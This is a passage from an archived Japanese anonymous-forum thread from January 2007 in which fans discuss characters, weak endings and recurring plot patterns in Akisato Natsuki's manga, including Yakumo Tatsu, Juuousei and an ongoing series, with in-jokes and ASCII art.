それをつらぬくのはかまわないけど状況を理解しないで周りにもその考えを強制して迷惑かけてるのはちょっとね
それで状況悪化させていざやばくなるとK2やミカにがなんとかしてくれるって他力本願で
実際そのせいでミカがああなっちゃったし
しばらく叩かれてもしょうがないね

250 :花と名無しさん:2007/01/08(月) 19:47:34 ID:9i8VtAcV0
今度はりなを私に重ねて叩くつもりかよ
お前の場合リアルと本気で混同するからタチ悪い

>>248
>周りにまで利他的である事を
>強要してるように見える

例えばどこのシーン?

>圧倒的カリスマで巻き込むんでも知略を巡らすんでもなく、
>ただイヤイヤ言ってるだけだから余計に

彼女にイヤという意思表示をする以外に何ができるの?
だいたい知略を巡らすなんて腹黒い人間のやることだと思うが

251 :花と名無しさん:2007/01/08(月) 19:56:03 ID:???0
>>250
釣り乙

252 :花と名無しさん:2007/01/09(火) 00:16:37 ID:???0
りなは確かに周り見えてないけど
それでも可愛くて一生懸命だと思うので好きだ。

でも、自分以外の大切な誰か(忍が)一回痛い目見て
愚かさに嘆くりながテラミタス…

253 :花と名無しさん:2007/01/09(火) 17:09:56 ID:???0
りな、いい子ちゃんすぎるんだよね。
好き嫌いが別れそう。
でも自分は好き。

254 :花と名無しさん:2007/01/10(水) 02:37:13 ID:???0
んー、なんと言うか、いい子ちゃんでもいいんだよ
周囲に迷惑を掛けないならね

りなの善は確かにケチがつけられないものなんだが
周囲を巻き込んで迷惑を掛けているところがちょっと

255 :花と名無しさん:2007/01/13(土) 02:38:15 ID:???0
バハムートwwwwwwwwwwwwww

すまん久しぶりにこのスレ見たから時間差が
>>175さん最高

256 :花と名無しさん:2007/01/13(土) 02:52:35 ID:???0
ヘルムート 零式
ヘルムート 改


すいませんしつこいですね

257 :花と名無しさん:2007/01/13(土) 10:44:01 ID:???0
ヘルムート初号機・・・・・

すまん逝ってくる

258 :花と名無しさん:2007/01/14(日) 01:59:33 ID:???0
ヘルムート初号機の搭乗者はもちろん…

259 :花と名無しさん:2007/01/14(日) 13:02:10 ID:???0
逃げちゃダメだ、逃げちゃダメだ、逃げちゃダメだ・・・・
. . .... ..::: : : :: : ::: :: : :::: :: ::: ::: ::::::::::::::::::::::::::::::::::::::::::::::::::
    . . .... ..: : :: :: ::: :::::: :::::::::::: : :::::::::::::::::::::::::::::::::::::::::::
        Λ_Λ   . . .: : : ::: : :: ::::::::: ::::::::::::::::::::::::::::
       /:彡ミ゛ヽ;)ー、 . . . .: : : :::::: :::::::::::::::::::::::::::::::
      / :::/:: ヽ、ヽ、 ::i . .:: :.: ::: . :::::::::::::::::::::::::::::::::::::
      / :::/;;:   ヽ ヽ ::l . :. :. .:: : :: :: :::::::: : ::::::::::::::::::
 ̄ ̄ ̄(_,ノ  ̄ ̄ ̄ヽ、_ノ ̄




でもヘルムート恐いよぉ〜
                                               ( ;´Д`)
                                              (つ  つ
                                              人  Y 
                                              し (_)

260 :花と名無しさん:2007/01/15(月) 20:11:23 ID:???0
デーモンで樹さんを知って八雲を読みました。
皆様の不等号でかなり下だったので不安でしたが、一気に読むと面白かったです!最終話以外は。
デーモンも最後が怖いなぁ。

261 :花と名無しさん:2007/01/15(月) 20:40:50 ID:???0
まさしくその「最終話以外は」でかなり下に行ってるんじゃないかと。
oz、花咲け、朱鷺色&パッションあたりはしっかり読めるラストなのになあ…

262 :花と名無しさん:2007/01/16(火) 00:42:36 ID:???O
そう、ある意味一番哀しいフレーズかもね>「最終回以外は」
花咲けなんて中盤ちょっとダレてる?とか思ったけど、ルマティの演説でキター!となって
最後のマハティの言葉で現在と過去が結び付いたような感動を覚えたものだよ
最終回が鍵だよなあ

263 :花と名無しさん:2007/01/16(火) 00:52:19 ID:???0
八雲はほんとなんであんな最終回にしたんだか。おかげで読み返せない。


264 :花と名無しさん:2007/01/16(火) 02:16:21 ID:???0
八雲と獣王星の時の樹さんはお疲れだったんだろうか

265 :260:2007/01/17(水) 01:41:20 ID:???0
あぁ、最終回が原因であの不等号の位置なのですね、納得です。
読み終わったあと「えっ?これはOKなのか?」と思わず突っ込みました。
打ち切りではないですよね?

266 :花と名無しさん:2007/01/17(水) 02:18:40 ID:???0
OZの最終回は神

267 :花と名無しさん:2007/01/17(水) 02:27:16 ID:???0
八雲は人気でて無理やり伸ばされた結果ああなったんだと思う。途中で本当は樹さんもうだれてるだろ・・?って思わせるようなことが何度も垣間見えたし
ただこの人のどの作品も最初〜半ばまでは面白いんだけど最後がなんか外すよね
ハッピーエンドでもバッドエンドでもなんか安易な方に逃げてしまってせっかくの今までの面白さが台無し、まではいかないけどちょっと冷めてしまうかんじ
どれ読んでもそう思う。この人の作品面白いし好きだけどそこが残念かな

268 :花と名無しさん:2007/01/17(水) 03:30:08 ID:???0
物語のすべてがラストに繋がっていく、という感じなので
そういう不満はないなー。
むしろラストで予想もしなかった展開!とか狙うと
八雲やら獣王星やらになってしまうんじゃないかと。

269 :花と名無しさん:2007/01/17(水) 19:32:11 ID:???0
違うだろ、どれも同じようなラストになるから
ツマンネって思うんだよ
何かの暴走を抑えて
(リンの力暴走、核融合炉の暴走
クインザの暴走、マサキの暴走、ワルキューレの暴走)
さらにどんでんがえし(レイ霧江に飲み込まれそうになる、リオンの幼児化
ツァオの反乱、念が膨れ上がる、ボールの射出)、それに抵抗
BADENDっぽい終焉、数年後の彼ら、結果HAPPYEND・・・
つー流れが変わらん限り、そう思い続けるだろうよ
漏れはこのマンガは遠山の金さんみたいなカンジかなって思いながら読んでるw
星野めみのマンガみたいになwちょっと違うかもしれんがww

270 :花と名無しさん:2007/01/18(木) 00:43:51 ID:???0
ヘタレてこそ忍

271 :花と名無しさん:2007/01/18(木) 13:14:01 ID:???0
忍がしっかりし出したら、とうとうヘルに改造されたかと
背中に操作スイッチやアンテナ探しちゃいそう。

272 :花と名無しさん:2007/01/19(金) 09:29:58 ID:???O
アンテナ…

ちょっと前からの流れでいくと、ここにはケットシー(Z)と書くべきなのか…
すみません、煎ってきます。

273 :花と名無しさん:2007/01/19(金) 17:03:19 ID:???0
忍ひどいいわれようだなw
へたれへたれいってるがあれでも秀才なんだぞ

274 :花と名無しさん:2007/01/19(金) 17:58:24 ID:???0
そうだぞ、何か色んな意味でやり手なんだぞ

275 :花と名無しさん:2007/01/19(金) 18:59:11 ID:???0
>>273-274
これで私も忍を可愛がってるのよ
そこもとこも覚えておいてちょうだい!!

276 :花と名無しさん:2007/01/19(金) 20:29:29 ID:???0
笑ったwww

277 :花と名無しさん:2007/01/19(金) 20:48:11 ID:???O
獣王星は糞だが八雲立つは一時期ハマリにハマってた。段々冷めて全巻ブッコフに養子に出したがw何か最近懐かしくなってまた集めようと思う。しかしそうまでして今再びあの時の情熱が燃えるかと言えば









無い

278 :花と名無しさん:2007/01/21(日) 16:34:56 ID:???O
八雲好きなんだよ。
やすこちゃん恐かったけど

その点ゾフィは安心して見ていられる
っか彼女が死んだら泣くと思う

279 :花と名無しさん:2007/01/22(月) 03:34:52 ID:???0
八雲はメイン2人よりもしをりちゃんが好きだったな
なぜかあのちょっとわがままなところがかわいかった


280 :花と名無しさん:2007/01/22(月) 09:55:40 ID:???0
八雲の現世と古代の登場人物の設定とか、
オズとオズの原作との登場人物の関係とか、
微妙にずらされているというか、ただストーリーを大事にしてる
ってことかもだが、考えていてもやもやしてしまう。作者の思うツボ?w

281 :花と名無しさん:2007/01/22(月) 20:00:37 ID:???0
あつみには優しい闇己がなんだか良かった。
やすこはひたすら怖かったけど。

282 :花と名無しさん:2007/01/22(月) 23:15:48 ID:???0
八雲は美女(やすことママン)も美少女も納得できたけど、
デーモンじゃもなをもうチョイ(見た目で)魅力的に描いて欲しいと思う。

樹さんの描く女性って、綺麗系はいいけど可愛い系がイマイチだよな〜

  

283 :花と名無しさん:2007/01/23(火) 01:09:07 ID:???0
八雲はあつみちゃんをもう少し可愛く描いて欲しいと思った。
一番好感度高かったのに。
夕香は当時みんな「美少女に見えん!」と言っていたけど、割と可愛く描いてたと思う。
もなもあのレベルで良いんだけどなあ。

綺麗系、それも悪女系や気の強い系は凄く綺麗だと思う。

284 :花と名無しさん:2007/01/24(水) 09:58:55 ID:???O
ゾフィに惚れた…。
獣王星エンドは回避してほしいな。

285 :花と名無しさん:2007/01/24(水) 20:13:29 ID:???0
初登場の花鹿は本当に美少女だったなあ

286 :花と名無しさん:2007/01/24(水) 20:13:48 ID:???O
お兄さん結構重要な役どころだなあ、地味だけど。
そしてエットーレおかしいなw

りなはちょっと出来過ぎのとこあるけど、やっぱり良い子だわ。
もなも頑張れよ〜と素直に応援できる。

デーモンは個人的にどのキャラも好感度が高い

287 :花と名無しさん:2007/01/24(水) 20:51:10 ID:???0
はやく皆帰ってくるといいなぁ。そしてお兄さんがかわいい


288 :花と名無しさん:2007/01/24(水) 21:04:09 ID:???0
お兄さん、萌えキャラ確定(;´Д`)ハァハァ

289 :花と名無しさん:2007/01/25(木) 00:09:19 ID:???0
お兄さん可愛いよお兄さん。

翔君も美羽ちゃんも良い子だな。
最初はあんなに憎たらしかったのに。

そしてK2はどうなったんだああああ!
気になる。

290 :花と名無しさん:2007/01/25(木) 02:33:34 ID:???0
>>286
りなは確かに出来すぎなところあるけど
聖少女っぷりはここぞって大事なときに発揮するからね
基本的にもなの方が出番が多いから、鼻につくこともない丁度いいバランス
それにしてもお兄さんは、登場するたびに自分の中で好感度が上がっていく…

73 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)